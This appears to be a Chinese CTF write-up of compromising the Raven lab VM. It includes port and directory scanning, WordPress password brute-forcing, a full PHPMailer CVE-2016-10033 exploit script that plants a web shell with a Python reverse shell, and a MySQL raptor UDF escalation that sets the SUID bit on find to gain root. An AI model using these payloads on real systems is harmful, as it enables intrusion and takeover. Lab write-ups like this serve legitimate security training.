主机发现

image-20231013145748903

扫描端口

1
nmap -A -p- -sV -O 192.168.142.146
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-13 14:59 CST
Nmap scan report for bogon (192.168.142.146)
Host is up (0.00052s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 2681c1f35e01ef93493d911eae8b3cfc (DSA)
|   2048 315801194da280a6b90d40981c97aa53 (RSA)
|   256 1f773119deb0e16dca77077684d3a9a0 (ECDSA)
|_  256 0e8571a8a2c308699c91c03f8418dfae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35622/udp6  status
|   100024  1          38375/tcp   status
|   100024  1          53179/udp   status
|_  100024  1          60457/tcp6  status
38375/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:6F:EF:C4 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms bogon (192.168.142.146)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds

目录扫描

1
dirb http://192.168.142.146/

image-20231013150337787

挨个访问扫到的目录,查看是否有其他信息

访问 http://192.168.142.146/vendor/的[README.md](http://192.168.142.146/vendor/README.md)和[VERSION](http://192.168.142.146/vendor/VERSION) 得到使用的是PHPMailer 5.2.16

访问 http://192.168.142.146/wordpress/ 通过指纹扫描确定是WordPress 4.8.23

image-20231013150845518

image-20231013150819801

其他目录没有发现敏感的信息

wpscan扫一下wordpress

1
wpscan --url http://192.168.142.146/wordpress/ -e u,ap

image-20231013152316974

发现两个用户名steven和michael 尝试爆破密码

image-20231013152648029

1
wpscan --url http://192.168.142.146/wordpress/ -U user.txt -P rockyou.txt

啥都没爆破出来…….

百度搜索历史漏洞

PHPMailer 5.2.16 有命令执行

image-20231013152942114

https://www.exploit-db.com/搜索相对性的脚本

image-20231013162650353

漏洞利用

使用PHPMailer < 5.2.18 - Remote Code Execution - PHP webapps Exploit (exploit-db.com)成功上传shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# -*- coding: utf-8 -*-

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')

print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝╚═╝")

print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://192.168.142.146/contact.php'

backdoor = '/shell.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.142.148\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'

fields={'action': 'submit',
   'name': payload,
   'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
   'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')

r = requests.post(target, data=m.to_string(),
 headers=headers)

print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]ExPLoITeD ' + target)

image-20231013164312916

kali 开启监听

image-20231013164346905

重新访问shell.php

image-20231013164410218

成功反弹到shell

提权

在wordpress的配置文件下找到数据库的用户名密码

image-20231013164755749

查看普通用户家目录没有发现

flag2 这个靶机好像是有好几个flag

image-20231013165028715

查看计划任务 内核 都没有有用的信息

登录mysql

在数据库里面没有得到有用的信息

看到数据库的版本是5.5.60

image-20231013165828354

查看进程mysql是root权限

image-20231013170758766

搜索mysql 5.5.60历史漏洞

https://www.exploit-db.com/exploits/1518

用户kali编译exp

1
2
gcc -g -c 1518.c
gcc -g -shared -o raptor_udf.so 1518.o -lc

将raptor_udf.so上传靶机的tmp目录下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
www-data@Raven:/tmp$ mysql -uroot -pR@v3nSecurity
mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf.so'));
insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname 'raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit
exit
Bye
www-data@Raven:/tmp$ touch finn
touch finn
www-data@Raven:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;
find finn -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

成功提权到root

拿到了flag4.txt

image-20231013181809267

有两个flag没找到,有空再找吧,不想找了~